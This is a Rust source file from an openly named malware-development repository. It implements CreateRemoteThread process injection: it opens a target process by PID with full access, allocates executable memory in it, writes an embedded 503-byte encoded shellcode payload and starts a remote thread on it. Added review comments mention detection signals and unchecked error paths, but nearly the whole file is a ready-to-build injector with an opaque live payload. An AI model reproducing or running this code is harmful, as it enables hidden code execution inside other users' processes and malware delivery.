/*
CreateRemoteThread Shellcode Injection : Exec Shellcode in Remote Process
For more codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
@5mukx
*/
use std::ptr::null_mut;
use winapi::{shared::minwindef::LPVOID, um::{errhandlingapi::GetLastError, handleapi::CloseHandle, memoryapi::{VirtualAllocEx, WriteProcessMemory}, processthreadsapi::{CreateRemoteThread, OpenProcess}, winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}}};
// Prints one success line in the tool's "\____[+] <message>" format.
// `$msg` is a format string and the remaining arguments fill its
// placeholders. The pattern requires the comma after `$msg`, so a call
// with only a message needs a trailing comma (`okey!("done",)`); every
// call in this file passes exactly one extra argument.
macro_rules! okey{
($msg:expr, $($arg:expr), *) => {
println!("\\____[+] {}", format!($msg, $($arg),*));
}
}
// Prints one failure line in the "\____[-] <message>" format, announces
// the exit, and terminates the process. `main` invokes it right after a
// null-handle / null-pointer check, so the statements following that
// `if` only ever run on the success path.
// NOTE(review): the process exits with status 0, which reports success to
// the caller even though this path is only taken on failure; a non-zero
// status would let a wrapper script tell the two apart. Left unchanged here.
macro_rules! error{
($msg:expr, $($arg:expr), *) => {
println!("\\____[-] {}", format!($msg, $($arg), *));
println!("Exiting ...");
std::process::exit(0);
}
}
// Entry point. Reads a target process ID from argv[1] and runs the textbook
// remote-thread injection sequence against that process with the embedded
// `buf` payload: OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread, all inside a single `unsafe` block.
// From a defender's view this exact four-call sequence is what process-
// injection detections key on: cross-process RWX allocation followed by a
// remote thread start (e.g. Sysmon Event ID 8 records the CreateRemoteThread).
// Panics (via `expect`) if the PID argument is missing or not a valid u32.
fn main(){
// Opaque 503-byte payload compiled into the binary. Its contents are not
// documented in this file; it is copied verbatim into the target process
// and used as the start address of the new thread.
let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
0x90,0x2a,0x5b,0x02,0xfe,0x59,0xda,0xcc,0x48,0x31,0x58,0x27,
0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x6c,0x62,0xd8,0xe6,
0x0e,0xb1,0x1a,0xcc,0x90,0x2a,0x1a,0x53,0xbf,0x09,0x88,0x9d,
0xc6,0x62,0x6a,0xd0,0x9b,0x11,0x51,0x9e,0xf0,0x62,0xd0,0x50,
0xe6,0x11,0x51,0x9e,0xb0,0x62,0xd0,0x70,0xae,0x11,0xd5,0x7b,
0xda,0x60,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x16,0x3a,0x7e,
0xfc,0x75,0xfa,0x8d,0x51,0xe3,0x56,0x43,0xff,0x98,0x38,0x21,
0xc2,0x6b,0x0a,0x4a,0x75,0x0b,0xfa,0x47,0xd2,0x16,0x13,0x03,
0x2e,0xd2,0x5a,0x44,0x90,0x2a,0x5b,0x4a,0x7b,0x99,0xae,0xab,
0xd8,0x2b,0x8b,0x52,0x75,0x11,0xc2,0x88,0x1b,0x6a,0x7b,0x4b,
0xff,0x89,0x39,0x9a,0xd8,0xd5,0x92,0x43,0x75,0x6d,0x52,0x84,
0x91,0xfc,0x16,0x33,0x37,0x11,0xeb,0x0c,0x3c,0x6b,0x9a,0xcb,
0xf3,0x18,0xdb,0x0d,0xa8,0xca,0x2e,0xf3,0xb2,0x5a,0x96,0xe8,
0x98,0x6f,0x62,0xd3,0x8b,0x81,0x82,0x88,0x1b,0x6a,0x7f,0x4b,
0xff,0x89,0xbc,0x8d,0x1b,0x26,0x13,0x46,0x75,0x19,0xc6,0x85,
0x91,0xfa,0x1a,0x89,0xfa,0xd1,0x92,0xcd,0x40,0x6b,0x03,0x43,
0xa6,0x07,0x83,0x96,0xd1,0x72,0x1a,0x5b,0xbf,0x03,0x92,0x4f,
0x7c,0x0a,0x1a,0x50,0x01,0xb9,0x82,0x8d,0xc9,0x70,0x13,0x89,
0xec,0xb0,0x8d,0x33,0x6f,0xd5,0x06,0x4b,0x40,0x2e,0xa9,0xfe,
0xcf,0x19,0x69,0x02,0xfe,0x18,0x8c,0x85,0x19,0xcc,0x13,0x83,
0x12,0xf9,0xdb,0xcc,0x90,0x63,0xd2,0xe7,0xb7,0xe5,0xd8,0xcc,
0x91,0x91,0x9b,0xaa,0x98,0x43,0x9b,0x98,0xd9,0xa3,0xbf,0x4e,
0x77,0xa8,0x9b,0x76,0xdc,0x5d,0x7d,0x05,0x01,0x8c,0x96,0x45,
0x7a,0x42,0x5a,0x03,0xfe,0x59,0x83,0x8d,0x2a,0x03,0xdb,0x69,
0xfe,0xa6,0x0f,0x9c,0xc0,0x67,0x6a,0xcb,0xb3,0x68,0x1a,0x84,
0x6f,0xea,0x13,0x8b,0x3c,0x11,0x25,0x0c,0xd8,0xa3,0x9a,0x43,
0x44,0xb3,0xd5,0x13,0x70,0xd5,0x8e,0x4a,0x77,0x9e,0xb0,0xdc,
0xd1,0x72,0x17,0x8b,0x1c,0x11,0x53,0x35,0xd1,0x90,0xc2,0xa7,
0x8a,0x38,0x25,0x19,0xd8,0xab,0x9f,0x42,0xfc,0x59,0xda,0x85,
0x28,0x49,0x36,0x66,0xfe,0x59,0xda,0xcc,0x90,0x6b,0x0b,0x43,
0xae,0x11,0x53,0x2e,0xc7,0x7d,0x0c,0x4f,0xcf,0x99,0xb0,0xc1,
0xc9,0x6b,0x0b,0xe0,0x02,0x3f,0x1d,0x88,0xb4,0x7e,0x5a,0x03,
0xb6,0xd4,0x9e,0xe8,0x88,0xec,0x5b,0x6a,0xb6,0xd0,0x3c,0x9a,
0xc0,0x6b,0x0b,0x43,0xae,0x18,0x8a,0x85,0x6f,0xea,0x1a,0x52,
0xb7,0xa6,0x12,0x81,0x19,0xeb,0x17,0x8b,0x3f,0x18,0x60,0xb5,
0x5c,0x15,0xdd,0xfd,0x2b,0x11,0xeb,0x1e,0xd8,0xd5,0x91,0x89,
0xf0,0x18,0x60,0xc4,0x17,0x37,0x3b,0xfd,0x2b,0xe2,0x2a,0x79,
0x32,0x7c,0x1a,0xb8,0x58,0xcc,0x67,0x51,0x6f,0xff,0x13,0x81,
0x3a,0x71,0xe6,0xca,0xec,0x20,0xdb,0xf9,0x1e,0x2c,0xdf,0x77,
0xd7,0x39,0x29,0x6d,0x94,0x59,0x83,0x8d,0x19,0xf0,0xa4,0xd7,
0xfe,0x59,0xda,0xcc];
// Every call below is raw Win32 FFI; none of the handle/pointer results
// carry Rust ownership, so error checking and cleanup are manual.
unsafe{
// argv[1] is the target PID. `expect` aborts with the given message when
// the argument is absent or does not parse as a u32.
let pid = std::env::args().nth(1).expect("Please provide the process ID as argument").parse::<u32>().expect("Invalid process ID");
// Access mask written as raw bits: 0x000F0000 (STANDARD_RIGHTS_REQUIRED)
// | 0x00100000 (SYNCHRONIZE) | 0xFFFF, i.e. the full-access mask that the
// winapi crate names PROCESS_ALL_ACCESS. The 0 means the handle is not
// inheritable.
let process_handle = OpenProcess(0x000F0000 | 0x00100000 | 0xFFFF, 0, pid);
// A null handle means the open failed (typically an invalid PID or
// insufficient privilege); `error!` prints GetLastError and exits.
if process_handle.is_null(){
error!("OpenProcess Error : {:?}",GetLastError());
}
okey!("OpenProcess: {:?}",process_handle);
// Reserve and commit buf.len() bytes in the target at an address of the
// system's choosing, with PAGE_EXECUTE_READWRITE protection. A region
// that is both writable and executable in another process is itself a
// strong signal that memory-scanning defences look for.
let remote_buffer = VirtualAllocEx(
process_handle,
null_mut(),
buf.len(),
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE,
);
// Null return means the allocation failed; report and exit as above.
if remote_buffer.is_null(){
error!("VirtualAlloc Error {:?}",GetLastError());
}
okey!("VirtualAlloc {:?}",remote_buffer);
// Copy the payload into the remote allocation.
// NOTE(review): the BOOL return value is discarded and
// lpNumberOfBytesWritten is passed as null, so a failed or partial write
// goes unnoticed and the thread below is still started on whatever the
// region holds. The other calls in this block do check their results.
WriteProcessMemory(
process_handle,
remote_buffer,
buf.as_ptr() as LPVOID,
buf.len(),
null_mut(),
);
// Start a thread in the target whose entry point is the remote buffer.
// `transmute` reinterprets the LPVOID allocation address as the
// LPTHREAD_START_ROUTINE parameter type that CreateRemoteThread expects.
// NOTE(review): the returned thread handle is bound to `_remote_thread`
// but never checked for null nor closed, so a CreateRemoteThread failure
// is not reported and the program still exits as if it succeeded.
let _remote_thread = CreateRemoteThread(
process_handle,
null_mut(),
0,
std::mem::transmute(remote_buffer),
null_mut(),
0,
null_mut(),
);
// Only the process handle is released explicitly; the thread handle (if
// one was returned) is left to process teardown.
CloseHandle(process_handle);
}
}